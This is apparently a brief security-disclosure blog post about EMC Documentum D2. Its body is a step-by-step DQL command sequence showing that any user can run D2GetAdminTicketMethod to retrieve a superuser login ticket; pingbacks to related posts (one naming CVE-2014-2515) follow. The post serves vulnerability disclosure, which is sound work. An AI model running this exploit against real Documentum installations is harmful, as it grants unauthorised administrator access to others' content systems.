documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

Any user is able to execute D2GetAdminTicketMethod to get superuser’s ticket:

1> create c6_method_return object set message='test'
2> go
(1 row affected)
1> execute do_method with method='D2GetAdminTicketMethod',
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'
3> go
(1 row affected)
1> select message from c6_method_return where r_object_id='00002ee280000e9b'
2> go
(1 row affected)

5 thoughts on “documentum security vulnerabilities: D2GetAdminTicketMethod (D2)

  1. Pingback: God bless EMC. Part IV | Documentum in a (nuts)HELL
  2. Pingback: Is it worth to treat flu if patient has cancer? | Documentum in a (nuts)HELL
  3. Pingback: CVE-2014-2515 (D2GetAdminTicketMethod). Was it really fixed? | Documentum in a (nuts)HELL
  4. Pingback: Is it possible to compromise Documentum by deleting object? Typical mistakes | Documentum in a (nuts)HELL
  5. Pingback: Say goodbuy LockBox. Part II | Documentum in a (nuts)HELL

Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s